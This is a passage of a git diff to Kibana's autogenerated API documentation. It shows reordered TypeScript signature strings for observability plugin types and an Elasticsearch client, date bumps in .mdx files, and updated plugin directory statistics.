\"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" 
| \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | 
\"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | 
\"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"as\" | keyof ", "CommonProps", - " | \"title\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"as\" | keyof React.ClassAttributes | keyof _EuiFlyoutProps>, \"children\" | \"color\" | \"id\" | \"lang\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | 
\"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | 
\"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | keyof ", + " | keyof React.ClassAttributes | keyof _EuiFlyoutProps>, \"children\" | \"onError\" | \"hidden\" | \"color\" | \"alert\" | \"title\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"key\" | \"id\" | \"css\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | 
\"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | 
\"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | 
\"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"as\" | keyof ", "CommonProps", - " | \"title\" | \"alert\" | \"hidden\" | \"key\" | \"css\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"as\" | \"alerts\" | keyof _EuiFlyoutProps | \"isInApp\" | \"observabilityRuleTypeRegistry\" | \"selectedAlertId\"> & { ref?: React.RefObject | ((instance: HTMLDivElement | null) => void) | null | undefined; }> & { readonly _result: ({ alert, alerts, isInApp, observabilityRuleTypeRegistry, onClose, selectedAlertId, }: AlertsFlyoutProps) => JSX.Element | null; }" + " | \"alerts\" | keyof _EuiFlyoutProps | \"isInApp\" | \"observabilityRuleTypeRegistry\" | \"selectedAlertId\"> & { ref?: React.RefObject | ((instance: HTMLDivElement | null) => void) | null | undefined; }> & { readonly _result: ({ alert, alerts, isInApp, observabilityRuleTypeRegistry, onClose, selectedAlertId, }: AlertsFlyoutProps) => JSX.Element | null; }" ], "path": "x-pack/plugins/observability/public/index.ts", 
"deprecated": false, @@ -3402,7 +3402,7 @@ "label": "ruleTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -3418,7 +3418,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">[]; get: (id: string) => ", + ">; list: () => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -3434,7 +3434,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">; register: (objectType: ", + ">[]; register: (objectType: ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -3463,11 +3463,11 @@ "label": "actionTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "ActionTypeModel", - "[]; get: (id: string) => ", + "; list: () => ", "ActionTypeModel", - "; register: (objectType: ", + "[]; register: (objectType: ", "ActionTypeModel", ") => void; has: (id: string) => boolean; }" ], 
@@ -5107,11 +5107,11 @@ "DisambiguateSet", ", Omit, \"href\">> & Omit, \"href\">) | (", "DisambiguateSet", - ", \"href\">, React.ButtonHTMLAttributes> & React.ButtonHTMLAttributes))), \"color\" | \"target\" | \"onClick\" | \"rel\"> & { size?: ItemSize | undefined; color?: Color | undefined; label: React.ReactNode; isActive?: boolean | undefined; isDisabled?: boolean | undefined; href?: string | undefined; target?: string | undefined; rel?: string | undefined; iconType?: ", + ", \"href\">, React.ButtonHTMLAttributes> & React.ButtonHTMLAttributes))), \"color\" | \"onClick\" | \"rel\" | \"target\"> & { size?: ItemSize | undefined; color?: Color | undefined; label: React.ReactNode; isActive?: boolean | undefined; isDisabled?: boolean | undefined; href?: string | undefined; target?: string | undefined; rel?: string | undefined; iconType?: ", "IconType", " | undefined; iconProps?: Omit<", "EuiIconProps", - ", \"type\"> | undefined; icon?: React.ReactElement> | undefined; showToolTip?: boolean | undefined; extraAction?: ({ type?: \"button\" | \"reset\" | \"submit\" | undefined; } & ", + ", \"type\"> | undefined; icon?: React.ReactElement> | undefined; showToolTip?: boolean | undefined; extraAction?: ({ type?: \"reset\" | \"button\" | \"submit\" | undefined; } & ", "EuiButtonIconProps", " & { onClick?: React.MouseEventHandler | undefined; } & React.ButtonHTMLAttributes & { buttonRef?: React.Ref | undefined; } & { alwaysShow?: boolean | undefined; }) | undefined; onClick?: React.MouseEventHandler | undefined; wrapText?: boolean | undefined; buttonRef?: React.Ref | undefined; }" ], 
@@ -5495,7 +5495,61 @@ "label": "client", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -5563,7 +5613,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -5589,33 +5639,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -5641,33 +5665,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -6627,6 +6625,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -7905,7 +7905,7 @@ "label": "TimeUnitChar", "description": [], "signature": [ - "\"d\" | \"s\" | \"m\" | \"h\"" + "\"d\" | \"h\" | \"m\" | \"s\"" ], "path": "x-pack/plugins/observability/common/utils/formatters/duration.ts", "deprecated": false, diff --git a/api_docs/observability.mdx b/api_docs/observability.mdx index a396a1f4a5cc5..4bc30e3b264af 100644 --- a/api_docs/observability.mdx +++ b/api_docs/observability.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/observability title: "observability" image: https://source.unsplash.com/400x175/?github description: API docs for the observability plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'observability'] --- import observabilityObj from './observability.devdocs.json'; diff --git a/api_docs/osquery.mdx b/api_docs/osquery.mdx index a43558a7decd9..7bc8ecfff0f9a 100644 --- a/api_docs/osquery.mdx +++ b/api_docs/osquery.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/osquery title: "osquery" image: https://source.unsplash.com/400x175/?github description: API docs for the osquery plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'osquery'] --- import osqueryObj from './osquery.devdocs.json'; diff --git a/api_docs/plugin_directory.mdx b/api_docs/plugin_directory.mdx index 9f32ff508650d..78835ab2ec375 100644 --- a/api_docs/plugin_directory.mdx +++ b/api_docs/plugin_directory.mdx @@ -7,7 +7,7 @@ id: kibDevDocsPluginDirectory slug: /kibana-dev-docs/api-meta/plugin-api-directory title: Directory description: Directory of public APIs available through plugins or packages. -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana'] --- @@ -15,13 +15,13 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | Count | Plugins or Packages with a
public API | Number of teams | |--------------|----------|------------------------| -| 403 | 337 | 37 | +| 404 | 338 | 37 | ### Public API health stats | API Count | Any Count | Missing comments | Missing exports | |--------------|----------|-----------------|--------| -| 29205 | 175 | 19670 | 911 | +| 29304 | 175 | 19745 | 910 | ## Plugin Directory @@ -33,7 +33,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Response Ops](https://github.com/orgs/elastic/teams/response-ops) | - | 368 | 0 | 359 | 21 | | | [APM UI](https://github.com/orgs/elastic/teams/apm-ui) | The user interface for Elastic APM | 39 | 0 | 39 | 53 | | | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 9 | 0 | 9 | 0 | -| | [App Services](https://github.com/orgs/elastic/teams/kibana-app-services) | Considering using bfetch capabilities when fetching large amounts of data. This services supports batching HTTP requests and streaming responses back. | 78 | 1 | 69 | 2 | +| | [App Services](https://github.com/orgs/elastic/teams/kibana-app-services) | Considering using bfetch capabilities when fetching large amounts of data. This services supports batching HTTP requests and streaming responses back. | 80 | 1 | 71 | 2 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds Canvas application to Kibana | 9 | 0 | 8 | 3 | | | [ResponseOps](https://github.com/orgs/elastic/teams/response-ops) | The Case management system in Kibana | 82 | 0 | 66 | 29 | | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | - | 272 | 2 | 253 | 9 | 
@@ -63,8 +63,8 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | The Event Annotation service contains expressions for event annotations | 95 | 0 | 95 | 6 | | | [Response Ops](https://github.com/orgs/elastic/teams/response-ops) | - | 100 | 0 | 100 | 9 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'error' renderer to expressions | 17 | 0 | 15 | 2 | -| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Gauge plugin adds a `gauge` renderer and function to the expression plugin. The renderer will display the `gauge` chart. | 61 | 0 | 61 | 2 | -| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Heatmap plugin adds a `heatmap` renderer and function to the expression plugin. The renderer will display the `heatmap` chart. | 107 | 0 | 103 | 3 | +| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Gauge plugin adds a `gauge` renderer and function to the expression plugin. The renderer will display the `gauge` chart. | 57 | 0 | 57 | 2 | +| | [Vis 